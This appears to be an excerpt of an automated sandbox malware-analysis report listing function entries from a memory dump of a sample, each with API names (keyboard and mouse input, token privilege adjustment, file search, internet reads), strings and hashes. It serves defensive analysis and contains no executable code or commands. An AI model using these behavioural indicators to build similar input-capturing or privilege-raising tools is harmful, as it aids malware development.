                                                                      • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                      • Instruction Fuzzy Hash: E6716F36A18B4186E700FB25E4453EE73A1FB88B84F404136EA4D97B6AEF7CD545CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                      • Instruction ID: 75da67a05630942f665056da3ed8c850a48c92e4574fb813341524304092386d
                                                                      • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                      • Instruction Fuzzy Hash: 3F311563A0C6818AE770BF2194027B92BA0EF54B50F550139DA89E3796EF3CD441EB40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DEFINE$x
                                                                      • API String ID: 0-4035502692
                                                                      • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                      • Instruction ID: a589ead493a9bab71a8a3495668ddbdede6f7f90d1fd0a50e667260afde80c04
                                                                      • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                      • Instruction Fuzzy Hash: E653B172B1C6528AE768EF25C4416BD37A0FB44B88F518036DE49E7786EF39E941E700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: da6e29006f01bd698c6eac7bc6c5edd526e300c14b6c3d3e53a12b26179e677e
                                                                      • Instruction ID: 8fdcc29affe18d5e0ae2e3fed5ba1e886b6439e9134c8a972ec3a57cd8fd55e4
                                                                      • Opcode Fuzzy Hash: da6e29006f01bd698c6eac7bc6c5edd526e300c14b6c3d3e53a12b26179e677e
                                                                      • Instruction Fuzzy Hash: F782B272A0CA4286EB54FF55E4866B933A0FB58B84F654035DA4DE7B96EF3CE440E700
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $[$\
                                                                      • API String ID: 0-3681541464
                                                                      • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                      • Instruction ID: 777257f1837c38f9994ffd3f8a9fa8b05446530e952c634162d493ef4d83a335
                                                                      • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                      • Instruction Fuzzy Hash: 34B28D32B1C7528AEB28AF65C4416AD37B1FB54748F514136CA0DEBB8AEF38E941D740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-0
                                                                      • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                      • Instruction ID: 04b091893ba568d48027972de295f90dd65cfaaf016fd08302780b1493656303
                                                                      • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                      • Instruction Fuzzy Hash: 4AD1A433B1C28687DB64EF15E18566AB691F788789F148134CB5AE7745EF3CE881DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                      • Instruction ID: 28338aef51f9d719d233d006f15f8ab9c1325f620acfa9eb39f4527186306e49
                                                                      • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                      • Instruction Fuzzy Hash: 26516A32A0CA4685EB14FF25D4862AC77A0FB84B94F504232CA6ED37A6EF3CE551D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                      • Instruction ID: e8b38d50e0bea9fc4c8a906f61c7a723d508ef9a46f292a3d89529fe2a8f2dc2
                                                                      • Opcode Fuzzy Hash: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                      • Instruction Fuzzy Hash: 3731643260CB8586E710BF25E4412AEB760FB84B94F114531EB8D97B66DF3CD546DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 2278415577-0
                                                                      • Opcode ID: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                      • Instruction ID: 3c643579efea9a996fcef2a6a78faa90cc75ec0905d9b4136d3a4086e18e1d48
                                                                      • Opcode Fuzzy Hash: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                      • Instruction Fuzzy Hash: 6C21CF72A0CA8585D704FF26E04526977A0FB88BC4F488034CF4C93759DF78D155D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                      • Instruction ID: 8c0273bd4eded4d4cc30dc98be5f10bb8192a7c62562f51738ddd532e1b87dc4
                                                                      • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                      • Instruction Fuzzy Hash: 700100736287818FE7109F20E4563A937A0F75476EF500929E64DC6A99DF7DC158CF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                      • Instruction ID: 3f5c252aef09e4d6e572add0a238f846776cab3ff9fd8e5bcc62ae482d4a8fd8
                                                                      • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                      • Instruction Fuzzy Hash: A331AE12B1D68144E720BF32984667AA790FB50BE4F449631EE9DE7BD6EE3CD0469340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 17014623-711622031
                                                                      • Opcode ID: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
                                                                      • Instruction ID: a0603b4469240b3688d8799fe7e8e8724b57885ddbae08cf7cf99b6f8f34aa0a
                                                                      • Opcode Fuzzy Hash: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
                                                                      • Instruction Fuzzy Hash: 80218E32B0CA5681E718FB16E45226A6361FB88B94F544030DE9DDB792EF7CE482E700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      • API String ID: 15204871-0
                                                                      • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                      • Instruction ID: e3088c430892ff1f40f39de97332f799c3463d3ceed01c98fc2ab5b5432378cb
                                                                      • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                      • Instruction Fuzzy Hash: A6B19B73609B848BEB15EF29C8463687BA0F780B48F189925DA9DC37A5DF39D851C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                      • Instruction ID: 27d69d1a428898c8183324377c9769cd66047735726a0b1a47947bacc7ae1445
                                                                      • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                      • Instruction Fuzzy Hash: 0E117F72B0878182EB00FB26E1863687760FB88B90F158631DA6D97B92DF7CD4518700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                      • Instruction ID: 506cf161ed421cde193dad3ed7ef81f0aabd261245944685120dc32c2647fca0
                                                                      • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                      • Instruction Fuzzy Hash: 5DF0C861A1CA4242E7607B16F44626EA3A5FFC8795F504234EB9DD3B9AEF3CC4049B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                      • Instruction ID: 293e9a429ea89c1ce572d4948183ffb227425813bbf10130f682135be7a46c41
                                                                      • Opcode Fuzzy Hash: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                      • Instruction Fuzzy Hash: 2AF0A0A6A1CA4182EB54FB21D4133B85360FBE8B8DF244532CE1DD6256DF2CC0869600
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 0-3206640213
                                                                      • Opcode ID: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                      • Instruction ID: a7c3362cd14598ab3d7a2c54e3a94580c586287a9dbf572b14d6e8afa8bbae9e
                                                                      • Opcode Fuzzy Hash: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                      • Instruction Fuzzy Hash: 77E1C623A0C65285FB64BF2481565BD23A5FF01781F54413AEA1EE6686FF3DE9D0E310
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: 0$0x%p
                                                                      • API String ID: 3215553584-2479247192
                                                                      • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                      • Instruction ID: 42130214740c6214d14d930103242497c2a10e78b2b5116142f9200496c4b04f
                                                                      • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                      • Instruction Fuzzy Hash: 3F81E522A1C2036AEB64BA25914267D2390EF61B44F541631DD2EF7697FF2DE846FF00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                      • Instruction ID: 2c26bf155b5ba57348e7eaa5f7159718db90bedac219474e813a79cc19e0201a
                                                                      • Opcode Fuzzy Hash: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                      • Instruction Fuzzy Hash: C9524A72A0C6429AFB10FF65C0822FD27A1AB49788F504531DE1EE7A97EF38E545E350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 101623796-0
                                                                      • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                      • Instruction ID: 3b027d7eef1226e236e476c616449f67125383b7bbc3606e12f67bfe3e326f34
                                                                      • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                      • Instruction Fuzzy Hash: 3F21A422F0C79242FB64FA11A0117B92350FB85B84F945235DA8CD7B86EF3CE941DB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
